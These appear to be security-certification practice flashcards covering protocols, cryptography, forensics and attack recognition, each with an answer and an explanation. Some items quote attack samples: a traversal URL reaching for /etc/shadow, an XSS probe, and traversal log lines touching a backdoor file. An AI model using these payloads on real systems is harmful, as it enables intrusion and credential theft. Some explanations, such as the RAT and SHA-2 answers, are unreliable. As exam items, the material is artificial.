Dion practice tests Flashcards

Question 1

Q

Which of the following protocols is commonly used to collect information about CPU utilization and memory usage from network devices?

SNMP
Netflow
MIB
SMTP

Answer

A

SNMP

OBJ-2.6: Simple Network Management Protocol (SNMP) is commonly used to gather information from routers, switches, and other network devices. It provides information about a device’s status, including CPU and memory utilization, as well as many other useful details about the device. NetFlow provides information about network traffic. A management information base (MIB) is a database used for managing the entities in a communication network. The Simple Mail Transfer Protocol (SMTP) is a communication protocol for electronic mail transmission.

Question 2

Q

A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URL, http://test.diontraining.com/../../../../etc/shadow. What type of attack has likely occurred?

SQL Injection
Directory traversal
XML injection
Buffer overflow

Answer

A

Directory traversal

OBJ-1.2: This is an example of a directory traversal. A directory traversal attack aims to access files and directories that are stored outside the webroot folder. By manipulating variables or URLs that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files. A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer’s boundary to overwrite an adjacent memory location. XML Injection is an attack technique used to manipulate or compromise the logic of an XML application or service. SQL injection is the placement of malicious code in SQL statements, via web page input.

Question 3

Q

You are trying to find a rogue device on your wired network. Which of the following options would NOT be helpful in finding the device?

MAC validation
Site surveys
War walking
Port scanning

Answer

A

War walking

OBJ-1.4: War walking is conducted by walking around a building while trying to locate wireless networks and devices. War walking will not help find a wired rogue device. Checking valid MAC addresses against a known list, scanning for new systems or devices, and physically surveying for unexpected systems can be used to find rogue devices on a wired network.

Question 4

Q

Which of the following does a User Agent request a resource from when conducting a SAML transaction?

Single sign-on (SSO)
Relying party (RP)
Identity provider (IdP)
Service provider (SP)

Answer

A

Service provider (SP)

OBJ-4.2: Security assertions markup language (SAML) is an XML-based framework for exchanging security-related information such as user authentication, entitlement, and attributes. SAML is often used in conjunction with SOAP. SAML is a solution for providing single sign-on (SSO) and federated identity management. It allows a service provider (SP) to establish a trust relationship with an identity provider (IdP) so that the identity of a user (the principal) can be trusted by the SP without the user having to authenticate directly with the SP. The principal’s User Agent (typically a browser) requests a resource from the service provider (SP). The resource host can also be referred to as the relying party (RP). If the user agent does not already have a valid session, the SP redirects the user agent to the identity provider (IdP). The IdP requests the principal’s credentials if not already signed in and, if correct, provides a SAML response containing one or more assertions. The SP verifies the signature(s) and (if accepted) establishes a session and provides access to the resource.

Question 5

Q

In an effort to increase the security of their passwords, Dion Training has added a salt and cryptographic hash to their passwords prior to storing them. To further increase security, they run this process many times before storing the passwords. What is this technique called?

Salting
Collision resistance
Key stretching
Rainbow table

Answer

A

Key stretching

OBJ-6.1: In cryptography, key stretching techniques are used to make a possibly weak key, typically a password or passphrase, more secure against a brute-force attack by increasing the resources it takes to test each possible key. The question describes one such key stretching technique.

Question 6

Q

Alexa is an analyst for a large bank that has offices in multiple states. She wants to create an alert to detect when an employee from one bank office logs into a workstation located at an office in another state. What type of detection and analysis is Alexa configuring?

Anomaly
Heuristic
Behavior
Trend

Answer

A

Behavior

OBJ-2.1: This is an example of behavior-based detection. Behavior-based detection (or statistical- or profile-based detection) means that the engine is trained to recognize baseline traffic or expected events associated with a user account or network device. Anything that deviates from this baseline (outside a defined level of tolerance) generates an alert. Heuristic analysis determines whether a number of observed data points constitutes an indicator and whether related indicators make up an incident depend on a good understanding of the relationship between the observed indicators. Human analysts are typically good at interpreting context but work painfully slowly, in computer terms, and cannot hope to cope with the sheer volume of data and traffic generated by a typical network. Anomaly analysis is the process of defining an expected outcome or pattern to events and then identifying any events that do not follow these patterns. This is useful in tools and environments that enable you to set rules. Trend analysis is not used for detection, but instead to better understand capacity and the normal baseline of a system. Behavioral-based detection differs from anomaly-based detection. Behavioral-based detection records expected patterns in relation to the entity being monitored (in this case, user logins). Anomaly-based detection prescribes the baseline for expected patterns based on its own observation of what normal looks like.

Question 7

Q

Which of the following is the LEAST secure wireless security and encryption protocol?

WPA
AES
WPA2
WEP

Answer

A

WEP

OBJ-6.3: Wired Equivalent Privacy (WEP) is a security protocol, specified in the IEEE Wireless Fidelity (Wi-Fi) standard, 802.11b, that is designed to provide a wireless local area network (WLAN) with a level of security and privacy comparable to what is usually expected of a wired LAN. It is the oldest form of wireless security and the weakest form. WEP can be cracked with brute force techniques in less than 5 minutes with a normal end-user computer.

Question 8

Q

Which of the following ports should you block at the firewall if you want to prevent a remote login to a server from occurring?

110
25
23
443

Answer

A

23

OBJ-2.6: Port 23 is used by telnet, which used to be used by administrators to connect remotely to a server and issue commands via a command-line interface. Telnet is not commonly used in networks anymore because all of the commands sent back and forth to the server are passed without any encryption or protection. Therefore, telnet is a security risk and has been mostly replaced by SSH (Port 22). Port 25 is used by SMTP, Port 110 is used by POP3, and port 443 is used by HTTPS.

Question 9

Q

Vulnerability scans must be conducted on a continuous basis in order to meet regulatory compliance requirements for the storage of PHI. During the last vulnerability scan, a cybersecurity analyst received a report of 2,592 possible vulnerabilities and was asked by the Chief Information Security Officer (CISO) for a plan to remediate all the known issues. Which of the following should the analyst do next?

Wait to perform any additional scanning until the current list of vulnerabilities have been remediated fully.

Attempt to identify all the false positives and exceptions, then resolve any remaining items.

Place any assets that contain PHI in a sandbox environment and then remediate all the vulnerabilities.

Filter the scan results to include only those items listed as critical in the asset inventory and remediate those vulnerabilities first.

Answer

A

Filter the scan results to include only those items listed as critical in the asset inventory and remediate those vulnerabilities first

OBJ-5.8: PHI is an abbreviation for Personal Health Information. When attempting to remediate a large number of vulnerabilities, it is crucial to prioritize the vulnerabilities to determine which ones should be remediated first. In this case, there is a regulatory requirement to ensure the security of the PHI data. Therefore, those assets that are critical to the secure handling or storage of PHI are of the highest risk should be prioritized for remediation first. It is impractical to resolve all 2,592 vulnerabilities at once. Therefore, you should not try to identify all the false positives and exceptions and then resolve any remaining items since they won’t be prioritized for remediation. You should also not wait to perform additional scanning because a scan is only a snapshot of your current status. If it takes 30 days to remediate all the vulnerabilities and you do not scan, new vulnerabilities may have been introduced during that time. Placing all the PHI asserts into a sandbox will not work either because then you have removed them from the production environment, and they can no longer serve their critical business functions.

Question 10

Q

You are working as part of a cyber incident response team. An ongoing attack has been identified on your webserver. Your company wants to take legal action against the criminals who have hacked your server, so they have brought in a forensic analyst from the FBI to collect the evidence from the server. What order should the digital evidence be collected based on the order of volatility?

Processor Cache, Random Access Memory, Swap File, Hard Drive or USB Drive

Swap File, Processor Cache, Random Access Memory, Hard Drive or USB Drive

Hard Drive or USB Drive, Swap File, Random Access Memory, Processor Cache

Processor Cache, Swap File, Random Access Memory, Hard Drive or USB Drive

Answer

A

Processor Cache, Random Access Memory, Swap File, Hard Drive or USB Drive

OBJ 5.5: The correct order for evidence collection based on the order of volatility is the Processor Cache, Random Access Memory, Swap File , and then the Hard Drive or USB Drive. Since the Processor Cache is the most volatile and changes the most frequently, it should be captured first. Random Access Memory (RAM) is temporary storage in a computer, can quickly change or overwritten, and the information stored in RAM is lost when power is removed from the computer, so it should be collected second. Swap files are temporary files on a hard disk that are used as virtual memory, and therefore, should be collected third. The files on a hard disk or USB drive are the least volatile of the four options presented since it is used for long-term storage of data and is not lost when the computer loses power.

Question 11

Q

Which of the following ports should you block at the firewall if you want to prevent a remote login to a server from occurring?

80
22
21
143

Answer

A

22

OBJ-2.6: Port 22 is used for SSH, which is used by administrators to securely connect remotely to a server and issue commands via a command-line interface. Port 21 is used by FTP, Port 80 is used by HTTP, and port 143 is used by IMAP.

Question 12

Q

You suspect that your server has been the victim of a web-based attack. Which of the following ports would most likely be seen in the logs to indicate the target of the attack?

443
3389
389
21

Answer

A

443

OBJ-2.6: Web-based attacks would likely appear on port 80 (HTTP) or port 443 (HTTPS). An attack against Active Directory is likely to be observed on port 389 LDAP. An attack on an FTP server is likely to be observed on port 21 (FTP). An attack using the remote desktop protocol would be observed on port 3389 (RDP).

Question 13

Q

53 TFTP
69 SMTP
25 HTTP
80 DNS

Using the image provided, place the port numbers in the correct order with their associated protocols:

25, 80, 53, 69
69, 25, 80, 53
53, 69, 25, 80
80, 53, 69, 25

Answer

A

69, 25, 80, 53

OBJ 2.6: For the exam, you need to know your ports and protocols. The Trivial File Transfer Protocol (TFTP) uses port 69. The Simple Mail Transfer Protocol (SMTP) uses port 25. The Hypertext Transfer Protocol (HTTP) uses port 80. The Domain Name Service (DNS) protocol uses port 53.

Question 14

Q

You are the first forensic analyst to arrive on the scene of a data breach. You have been asked to begin evidence collection on the server while waiting for the rest of your team to arrive. Which of the following evidence should you capture first?

Image of the server's SSD
ARP cache
L3 cache
Backup tapes

Answer

A

L3 cache

OBJ-5.5: When collecting evidence, you should always follow the order of volatility. This will allow you to collect the most volatile evidence (most likely to change) first, and the least volatile (least likely to change) last. You should always begin the collection with the CPU registers and cache memory (L1/L2/L3/GPU). The contents of system memory (RAM), including a routing table, ARP cache, process tables, kernel statistics, and temporary file systems/swap space/virtual memory. Next, you would move onto the collection of data storage devices like hard drives, SSDs, and flash memory devices. After that, you would move onto less volatile data such as backup tapes, external media devices (hard drives, DVDs, etc.), and even configuration data or network diagrams.

Question 15

Q

What type of malware changes its binary pattern in its code on specific dates or times in order to avoid detection by antimalware software?

Polymorphic virus
Ransomware
Logic bomb
Trojan

Answer

A

Polymorphic virus

OBJ-1.1: A polymorphic virus alters its binary code in order to avoid detection by antimalware scanners that rely on signature-based detection. By changing its signature, the virus can avoid detection.

Question 16

Q

While conducting a penetration test of an organization’s web applications, you attempt to insert the following script into the search form on the company’s web site: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- alert(“This site is vulnerable to an attack!”) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Then, you clicked the search button, and a pop-up box appears on your screen showing the following text, “This site is vulnerable to an attack!” Based on this response, what vulnerability have you uncovered in the web application?

Cross-site scripting
Cross-site request forgery
Distributed denial of service
Buffer overflow

Answer

A

Cross-site scripting

OBJ-1.2: This is a form of Cross-Site Scripting (XSS). Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. Cross-site request forgery (CSRF or XSRF) is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts. There are many ways in which a malicious website can transmit commands such as specially-crafted image tags, hidden forms, and JavaScript XMLHttpRequests can all work without the user’s interaction or even knowledge. A distributed denial-of-service (DDoS) attack is a malicious attempt to disrupt normal traffic of a targeted server, service, or network by overwhelming the target or its surrounding infrastructure with a flood of Internet traffic. A buffer overflow is an anomaly that occurs when a program overruns the buffer’s boundary and overwrites adjacent memory locations while writing data to a buffer.

Question 17

Q

Which of the following cryptographic algorithms is classified as asymmetric?

DSA
DES
AES
RC4

Answer

A

DSA

OBJ-6.2: The Digital Signature Algorithm (DSA) is a Federal Information Processing Standard for digital signatures. The algorithm uses a key pair consisting of a public key and a private key. AES, RC4, and DES are all symmetric algorithms.

Question 18

Q

Which of the following methods should a cybersecurity analyst use to locate any instances on the network where passwords are being sent in cleartext?

SIEM event log monitoring
Net flow capture
Full packet capture
Software design documentation review

Answer

A

Full packet capture

OBJ-2.1: Full packet capture records the complete payload of every packet crossing the network. The other methods will not provide sufficient information to allow for the detection of a cleartext password being sent. A net flow analysis will determine where communications occurred, by what protocol, to which devices, and how much content was sent, but it will not reveal anything about the content itself since it only analyzes the metadata for each packet crossing the network. A SIEM event log being monitored might detect that an authentication event has occurred, but it will not necessarily reveal if the password was sent in cleartext, as a hash value, or in the ciphertext. A software design documentation may also reveal what the designer’s intentions for authentication were when they created the application, but this only provides an ‘as designed’ approach for a given software and does not provide whether the ‘as built’ configuration was implemented securely.

Question 19

Q

Which of the following hashing algorithms results in a 256-bit fixed output?

SHA-1
NTLM
SHA-2
MD-5

Answer

A

SHA-2

OBJ-6.2: SHA-2 creates a 256-bit fixed output. SHA-1 creates a 160-bit fixed output. NTLM creates a 128-bit fixed output. MD-5 creates a 128-bit fixed output.

Question 20

Q

You have been asked to develop a solution for one of your customers. The customer is a software development company, and they need to be able to test a wide variety of operating systems to test the software applications their company is developing internally. The company doesn’t want to buy a bunch of computers to install all of these operating systems for testing. Which of the following solutions would BEST meet the company’s requirements?

Purchase a high-end computer that has a lot of CPU cores and RAM, install a hypervisor, and configure a virtual machine for each operating system that will be used to test the applications being developed

Purchase multiple inexpensive workstations and install one operating system that will be used to test the applications being developed on each workstation

Purchase one computer, install an operating system on it, create an image of the system, then reformat it, install the next operating system, create another image, and reimage the machine each time you need to test a different application

Purchase multiple workstations, install a VM on each one, then install one operating system that will be used to test the applications being developed in each VM

Answer

A

Purchase a high-end computer that has a lot of CPU cores and RAM, install a hypervisor, and configure a virtual machine for each operating system that will be used to test the applications being developed

OBJ-3.7: Since the company’s main goal was to minimize the amount of hardware required, the BEST solution is to purchase a high-end computer that has a lot of CPU cores and RAM, install a hypervisor, and configure a virtual machine for each operating system that will be used to test the applications being developed. This allows a single machine to run multiple operating systems for testing with the least amount of hardware.

Question 21

Q

Which of the following is NOT considered part of the Internet of Things?

Laptop
SCADA
Smart television
ICS

Answer

A

Laptop

OBJ-3.5: Supervisory control and data acquisition (SCADA) systems, industrial control systems (ICS), internet-connected televisions, thermostats, and many other things examples of devices classified as the Internet of Things (IoT). A laptop would be better classified as a computer or host than as part of the Internet of Things. The Internet of things (IoT) is a system of interrelated computing devices, mechanical and digital machines provided with unique identifiers (UIDs) and the ability to transfer data over a network without requiring human-to-human or human-to-computer interaction.

Question 22

Q

Susan, a help desk technician at Dion Training, has received several trouble tickets today related to employees receiving the same email as part of a phishing campaign. She has determined that the malicious link in the email is not being blocked by the company’s security suite when a user clicks the link. Susan asks you what action can be performed to prevent a user from reaching the website that is associated with the malicious link in the phishing email. What action do you recommend she utilize?

Block the IP address of the malicious domain in your firewall’s ACL

Add the malicious domain name to your content filter and web proxy’s blacklist

Forward this phishing email to all employees with a warning not to click on the embedded links

Enable TLS on your organization’s mail server

Answer

A

Add the malicious domain name to your content filter and web proxy’s blacklist

OBJ-2.3: To prevent a user from accessing the malicious website when the link is clicked, the malicious domain name should be added to the blacklist of the company’s content filter and web proxy. This will ensure that no devices on the network can reach the malicious domain name. While blocking the IP address associated with the domain name might help for a short period of time, the owner of the malicious domain could quickly redirect the DNS to point to a different IP, and then the users would still be able to access the malicious domain and its contents. Enabling TLS on the mail server will only encrypt the connection between the email server and its clients, but it will not prevent the users from clicking on the malicious link and accessing the malicious content. While informing the users that there is an active attempt at phishing being conducted against the organization is a good idea, forwarding the phishing email with the malicious link will generally cause more users to accidentally click on the malicious link, which further exacerbates the issue.

Question 23

Q

Which of the following cryptographic algorithms is classified as symmetric?

ECC
RSA
Twofish
Diffie-Hellman

Answer

A

Twofish

OBJ-6.2: Twofish is a symmetric key block cipher with a block size of 128 bits and key sizes up to 256 bits. ECC, RSA, and Diffie-Hellman are all asymmetric algorithms.

Question 24

Q

Riaan’s company runs critical web applications. During a vulnerability scan, Riaan found a serious SQL injection vulnerability in one of their web applications. The system cannot be taken offline to remediate the vulnerability. Which of the following compensating controls should Riaan recommend using until the system can be remediated?

WAF
IPS
Vulnerability scanning
Encryption

Answer

A

WAF

OBJ-3.2: WAF (web application firewall) is the best option since it has the ability to serve as a compensating control and can protect against web application vulnerabilities like an SQL injection until the application can be fully remediated. Vulnerability scanning could only be used to detect the issue. Therefore, it is a detective control, not a compensating control. Encryption would not be effective in stopping an SQL injection. An IPS is designed to protected network devices based on ports, protocols, and signatures. It would not be effective against an SQL injection and is not considered a compensating control for this vulnerability.

Question 25

Q

Which of the following cryptographic algorithms is classified as asymmetric?

AES
RC4
DES
RSA

Answer

A

RSA

OBJ-6.2: RSA (Rivest–Shamir–Adleman) was one of the first public-key cryptosystems and is widely used for secure data transmission. As a public-key cryptosystem, it relies on an asymmetric algorithm. AES, RC4, and DES are all symmetric algorithms.

Question 26

Q

What tool is used to collect wireless packet data?

Nessus
John the Ripper
Aircrack-ng
Netcat

Answer

A

Aircrack-ng

OBJ-2.2: Aircrack-ng is a complete suite of wireless security assessment and exploitation tools that includes monitoring, attacking, testing, and cracking of wireless networks. This includes packet capture and export of the data collected as a text file or pcap file. John the Ripper is a password cracking software tool. Nessus is a vulnerability scanner. Netcat is used to create a reverse shell from a victimized machine back to an attacker.

Question 27

Q

You are attending a cybersecurity conference and just watched a security researcher demonstrating the exploitation of a web interface on a SCADA/ICS component. This caused the device to malfunction and be destroyed. You recognize that the same component is used throughout your company’s manufacturing plants. Which of the following mitigation strategies would provide you with the most immediate protection against this emergent threat?

Evaluate if the web interface must remain open for the system to function; if it isn’t needed, block the web interface

Replace the affected SCADA/ICS components with more secure models from a different manufacturer

Demand that the manufacturer of the component release a patch immediately and deploy the patch as soon as possible

Logically or physically isolate the SCADA/ICS component from the enterprise network

Answer

A

Evaluate if the web interface must remain open for the system to function; if it isn’t needed, block the web interface

Explanation
OBJ-3.5: The most immediate protection against this emergent threat would be to block the web interface from being accessible over the network. Before doing this, though, you must evaluate whether the interface needs to remain open for the system to function properly. If it is not needed, you should block it to minimize the attack surface of the SCADA/ICS component. Ideally, your SCADA/ICS components should already be logically or physically isolated from the enterprise network. Since the question doesn’t mention the networks as an area of concern, we can assume they are already following the industry best practice of logical or physical segmentation between the SCADA/ICS network and the enterprise network. On the exam, make sure you focus on the question being asked. In this case, the question focuses on the web interface. Developing a patch can be a time-consuming process, therefore waiting for the manufacturer to provide a patch will not provide immediate protection to your components. The same holds true with replacing the affected components. Even if you could get the company to authorize the funding for such a purchase, it would take time to order, ship, receive, and install the new components. Additionally, you would cause unwanted downtime in the factory during the installation of the components, making it an ineffective option when simply blocking the web interface is free, quick, and effective.

Question 28

Q

Review the network diagram provided. Which of the following ACL entries should be added to the firewall to allow only the Human Resources (HR) computer to have SMB access to the file server (Files)?

(Note: The firewall in this network is using implicit deny to maintain a higher level of security. ACL entries are in the format of Source IP, Destination IP, Port Number, TCP/UDP, Allow/Deny.)

Intranet Workstations Data Center
Sales: 172.16.1.2 Backup: 192.168.1.10
HR: 172.16.1.3 Confidential: 192.168.1.11
IT: 172.16.1.4 Files: 192.168.1.12

16.1.3, 192.168.1.12, ANY, TCP, ALLOW
16.1.12/24, 192.168.1.3/24, 445, TCP, ALLOW
16.1.3, 192.168.1.12, 445, TCP, ALLOW
168.1.12, 172.16.1.3, 445, UDP, DENY

Answer

A

172.16.1.3, 192.168.1.12, 445, TCP, ALLOW

OBJ 2.1: The ACL should be created with 172.16.1.3 as the Source IP, 192.168.1.12 as the Destination IP, 445 as the port number operating over TCP, and the ALLOW condition set. This is the most restrictive option presented (only the HR and Files server are used), and the minimal number of ports are opened to accomplish our goal (only port 445 for the SMB service).

Question 29

Q

You are working as a help desk technician and received a call from a user who is complaining about their computer’s performance has slowed down over the last week since they installed a new free video game on the computer. As part of your troubleshooting efforts, you enter the command prompt in Windows and run the following command:
c:\Windown\system32>netstat -anb
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:135 0;0.0.0:0 Listening
TCP 0.0.0.0:445 0.0.0.0:0 Listening
TCP 10.10.10.123:51232 64.59.12.54:80 Established
UDP 10.10.10.123:53 .

Based on the output provided, what type of malware may have been installed on this user’s computer?

Worm
Spam
Keylogger
RAT

Answer

A

RAT

OBJ 1.1: Based on the scenario and the output provided, the best choice is a RAT. A RAT is a Remote Access Trojan and it is usually installed accidentally by a user when they install free software on their machine that has a RAT embedded into it. The first two lines of the output show that ports 135 and 445 are open and listening for an inbound connection (which is typical of a RAT). This is not an example of a worm because the user admitted to installing a free program, and worms can install themselves and continue to send data outbound across the network to continue to spread. There is no indication in the scenario that a keylogger is being used, nor that spam (unsolicited emails) have been received.

Question 30

Q

Which of the following formats do SAML transactions use when communicating information between the identity provider and the service provider?

CSV
JSON
HTML
XML

Answer

A

XML

OBJ-4.2: Security Assertion Markup Language (SAML) is an open standard that allows identity providers (IdP) to pass authorization credentials to service providers (SP). SAML transactions use Extensible Markup Language (XML) for standardized communications between the identity provider and service providers. SAML is the link between the authentication of a user’s identity and the authorization to use a service.

Question 31

Q

A cybersecurity analyst is working at a college that wants to increase the security of its network by implementing vulnerability scans of centrally managed workstations, student laptops, and faculty laptops. Any proposed solution must be able to scale up and down as new students and faculty use the network. Additionally, the analyst wants to minimize the number of false positives to ensure accuracy in their results. The chosen solution must also be centrally-managed through an enterprise console. Which of the following scanning topologies would be BEST able to meet these requirements?

Passive scanning engine located at the core of the network infrastructure

Active scanning engine installed on the enterprise console

Combination of cloud-based and server-based scanning engines

Combination of server-based and agent-based scanning engines

Answer

A

Active scanning engine installed on the enterprise console

OBJ-2.2: Since the college wants to ensure there is a centrally-managed enterprise console, using an active scanning engine installed on the enterprise console would best meet these requirements. Then, the college’s cybersecurity analysts could perform scans on any devices that are connected to the network using the active scanning engine at the desired intervals. Agent-based scanning would be ineffective since the college cannot force the installation of the agents onto each of the personally owned devices brought in by the students or faculty. A cloud-based or server-based engine may be useful, but it won’t address the centrally-managed requirement. Passive scanning is less intrusive but is subject to a high number of false positives.

Question 32

Q

A cybersecurity analyst is reviewing the logs of a Citrix NetScaler Gateway running on a FreeBSD 8.4 server and saw the following output: -=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=- 10.1.1.1 - - [10/Jan/2020:13:23:51 +0000] “POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1” 200 143 “https://10.1.1.2/” “USERAGENT “ 10.1.1.1 - - [10/Jan/2020:13:23:53 +0000] “GET /vpn/../vpns/portal/backdoor.xml HTTP/1.1” 200 941 “-“ “USERAGENT” 10.1.1.1 - - [10/Jan/2020:16:12:31 +0000] “POST /vpns/portal/scripts/newbm.pl HTTP/1.1” 200 143 “https://10.1.1.2/” “USERAGENT” -=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=- What type of attack was most likely being attempted by the attacker?

XML injection
Directory traversal
SQL injection
Password spraying

Answer

A

Directory traversal

OBJ-1.2: A directory traversal attack aims to access files and directories that are stored outside the webroot folder. By manipulating variables or URLs that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files. The example output provided comes from a remote code execution vulnerability being exploited in which a directory traversal is used to access the files. XML Injection is an attack technique used to manipulate or compromise the logic of an XML application or service. SQL injection is the placement of malicious code in SQL statements via web page input. Password spraying attempts to crack various user’s passwords by attempting a compromised password against multiple user accounts.

Question 33

Q

You have been investigating how a malicious actor was able to exfiltrate confidential data from a web server to a remote host. After an in-depth forensic review, you determine that the web server’s BIOS had been modified by the installation of a rootkit. After you remove the rootkit and reflash the BIOS to a known good image, what should you do in order to prevent the malicious actor from affecting the BIOS again?

Install a host-based IDS
Utilize secure boot
Install an anti-malware application
Utilize file integrity monitoring

Answer

A

Utilize secure boot

OBJ-3.3: Since you are trying to protect the BIOS, utilizing secure boot is the best choice. Secure boot is a security system offered by UEFI. It is designed to prevent a computer from being hijacked by a malicious OS. Under secure boot, UEFI is configured with digital certificates from valid OS vendors. The system firmware checks the operating system boot loader using the stored certificate to ensure that it has been digitally signed by the OS vendor. This prevents a boot loader that has been changed by malware (or an OS installed without authorization) from being used. The TPM can also be invoked to compare hashes of key system state data (boot firmware, boot loader, and OS kernel) to ensure they have not been tampered with by a rootkit. The other options are all good security practices, but they only apply once you have already booted into the operating system. This makes them ineffective against boot sector or rootkit attacks.

Question 34

Q

What tool can be used as an exploitation framework during your penetration tests?

Metasploit
Nessus
Autopsy
Nmap

Answer

A

Metasploit

OBJ-1.4: The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Nessus is a very popular vulnerability scanner. It can be used to check how vulnerable your network is by using various plugins to test for vulnerabilities. Also, Nessus can be used to perform compliance auditing, like internal and external PCI DSS audit scans. The nmap tool is a port scanner. BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

Question 35

Q

When your credit card data is written to the customer invoicing system at Dion Training, the first 12 digits are replaced with an x before storing the data. Which of the following privacy methods is being used?

Tokenization
Data minimization
Data masking
Anonymization

Answer

A

Data masking
OBJ-5.8: Data masking can mean that all or part of the contents of a field is redacted, by substituting all character strings with x, for example. Tokenization means that all or part of data in a field is replaced with a randomly generated token. The token is stored with the original value on a token server or token vault, separate from the production database. An authorized query or app can retrieve the original value from the vault, if necessary, so tokenization is a reversible technique. Data minimization involves limiting data collection to only what is required to fulfill a specific purpose. By reducing what information is collected, it reduces the amount and type of information that must be protected. Data anonymization is the process of removing personally identifiable information from a data set so that the people whom the data describe remain anonymous.

Question 36

Q

A cybersecurity analyst has determined that an attack has occurred against your company’s network. Fortunately, your company uses a good system of logging with a centralized syslog server, so all the logs are available, were collected, and have been stored properly. According to the cybersecurity analyst, the logs indicate that the database server was the only company server on the network that appears to have been attacked. The network is a critical production network for your organization. Therefore, you have been asked to choose the LEAST disruptive actions on the network while performing the appropriate incident response actions. Which actions do you recommend to as part of the response efforts?

Isolate the affected server from the network immediately, format the database server, reinstall from a known good backup

Capture network traffic using a sniffer, schedule a period of downtime to image and remediate the affected server, and maintain the chain of custody

Immediately remove the database server from the network, create an image of its hard disk, and maintain the chain of custody

Conduct a system restore of the database server, image the hard drive, and maintain the chain of custody

Answer

A

Capture network traffic using a sniffer, schedule a period of downtime to image and remediate the affected server, and maintain the chain of custody

OBJ-5.4: Since the database server is part of a critical production network, it is important to work with the business to time the period of remediation to minimize productivity losses. You can immediately begin to capture network traffic since this won’t affect the database server or the network (least intrusive) while scheduling a period of downtime in which to take a forensic image of the database server’s hard drive. All network captures and the hard drive should be maintained under the chain of custody in case it is needed for criminal prosecution or civil action after remediation. The server should be remediated and brought back online once the hard drive image has been created.

Question 37

Q

Which of the following is the MOST secure wireless security and encryption protocol?

WPA
WPS
WPA2
WEP

Answer

A

WPA2
OBJ-6.3: WPA2 is the most secure wireless security and encryption protocol. WPA2 uses a pre-shared key (PSK) for authentication and is designed to secure both home and enterprise wireless networks.

Question 38

Q

An attacker is using the nslookup interactive mode to locate information on a Domain Name Service (DNS). What command should they type to request the appropriate records for only name servers?

request type=ns
set type=ns
locate type=ns
transfer type=ns

Answer

A

set type=ns
OBJ-2.2: The “set type=ns” tells nslookup to only report information on name servers. If you used “set type=mx” instead, you would receive information only about mail exchange servers.

Question 39

Q

161 SCP
22 POP3
23 SNMP
110 Telnet

Using the image provided, place the port numbers in the correct order with their associated protocols:

23, 110, 22, 161
161, 22, 110, 23
22, 110, 161, 23
110, 161, 23, 22

Answer

A

22, 110, 161, 23
OBJ 2.6: For the exam, you need to know your ports and protocols. The Secure Copy (SCP) operates over port 22. Telnet operates over port 23. The Simple Network Management Protocol (SNMP) operates over port 161. The Post Office Protocol 3 (POP3) operates over port 110.

Question 40

Q

A new security appliance was installed on a network as part of a managed service deployment. The vendor controls the appliance, and the IT team is not able to log in or configure it. The IT team is concerned about the appliance receiving necessary updates. Which of the following mitigations should be performed to minimize the concern for the appliance and updates?

Configuration management
Vulnerability scanning
Automatic updates
Scan and patch the device

Answer

A

Vulnerability scanning
OBJ-3.3: The best option here is vulnerability scanning, as this allows the IT team to know what risks their network is taking on and where subsequent mitigations may be possible. Configuration management, automatic updates, and patching could be a possible solution. These are not viable options without gaining administrative access to the appliance. Therefore, it is best for the analyst to continue to conduct vulnerability scanning of the device to understand the risks associated with it, and then make recommendations to add additional compensating controls like firewall configurations, adding a WAF, providing segmentation, and other configurations outside the appliance to minimize the vulnerabilities it presents.

Question 41

Q

Which type of media sanitization would you classify degaussing as?

Destruction
Erasing
Purging
Clearing

Answer

A

Purging
OBJ-5.7: Degaussing is classified as a form of purging. Purging eliminates information from being feasibly recovered even in a laboratory environment. Purging includes degaussing, encryption of the data with the destruction of its encryption key, and other non-destructive techniques. Some generic magnetic storage devices can be reused after the degaussing process has occurred, such as VHS tapes and some older backup tapes. For this reason, though, the technique of degaussing is classified as purging and not destruction, even though hard drives are rendered unusable after being degaussed. Clearing data prevents data from being retrieved without the use of state of the art laboratory techniques. Clearing often involves overwriting data one or more times with repetitive or randomized data. Destroying data is designed not merely to render the information unrecoverable, but also to hinder any reuse of the media itself. Destruction is a physical process that may involve shredding media to pieces, disintegrating it to parts, pulverizing it to powder, or incinerating it to ash. Erasing or deleting is considered a normal operation of a computer, which erases the pointer to the data file on a storage device. Erasing and deleting are easily reversed, and the data can be recovered with commercially available or open-source tools.

Question 42

Q

Which of the protocols listed is NOT likely to be a trigger for a vulnerability scan alert when it is used to support a virtual private network (VPN)?

PPTP
IPSec
SSLv3
SSLv2

Answer

A

IPSec
OBJ-2.1: IPSec is the most secure protocol that works with VPNs. The use of PPTP and SSL is discouraged for VPN security. Due to this, the use of PPTP and SSL for a VPN will likely alert during a vulnerability scan as an issue to be remediated.

Question 43

Q

Mantrap
Biometrics
Proximity badges
Remote wipe
Antivirus
Cable lock
ECC
GPS tracking
FM-200
Strong passwords

Select four security features that you should use to best protect your servers in the data center. This can include physical, logical, or administrative protections.

GPS tracking, Biometrics, Proximity badges, Remote wipe

FM-200, Biometric locks, Mantrap, Antivirus

Antivirus, Mantrap, Cable lock, GPS tracking

Strong passwords, Biometrics, Mantrap, Cable lock

Answer

A

FM-200, Biometric locks, Mantrap, Antivirus

